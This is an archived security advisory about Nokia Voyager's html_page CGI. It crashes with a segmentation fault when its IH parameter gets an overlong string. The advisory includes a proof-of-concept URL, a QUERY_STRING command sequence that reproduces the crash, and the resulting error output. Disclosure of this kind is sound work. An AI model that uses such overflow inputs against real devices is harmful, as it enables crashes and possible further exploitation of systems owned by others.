Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: nok-a.htm

Nokia Voyager malformed URL segfault



Vulnerability

    Nokia Voyager

Affected

    Nokia Voyager

Description

    Gregory  Duchemin   found  following.    Voyager   works  with   a
    multipurposes cgi called  html_page that make  a call to  html_gen
    with a filename as a template script.  Html_gen produce the  final
    html page returned by apache.  If You test this kind of URL:

        http://your-nokia/http://10.1.152.2/cgi-bin/html_page?TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    You'll get a  segfault error page.   If u test  it with a  command
    line, You'll reproduce  the same signal.   Obviously, html_gen  is
    unable to  manage properly  a big  amount a  data in  some of  its
    parameters. IH is one of the html_page's paramaters that does  the
    job.

    With telnet, try (under tcsh)

        #setenv QUERY_STRING
        "TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        #/web/cgi-bin/html_page

        Content-type: text/html

        <br>Html_gen exited because of signal:  Segmentation fault<br>
        nokia1[admin]#

Solution

    Because  u  already  must  be  administrator to access the voyager
    setup, security impact is relatively low considering that  default
    configuration wasn't poorly modified.

    Because nokia ipso isn't dedicated for a multi-user work usage and
    noone else root should be able to login, impact for local  rooting
    is low too considering the same things that above.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH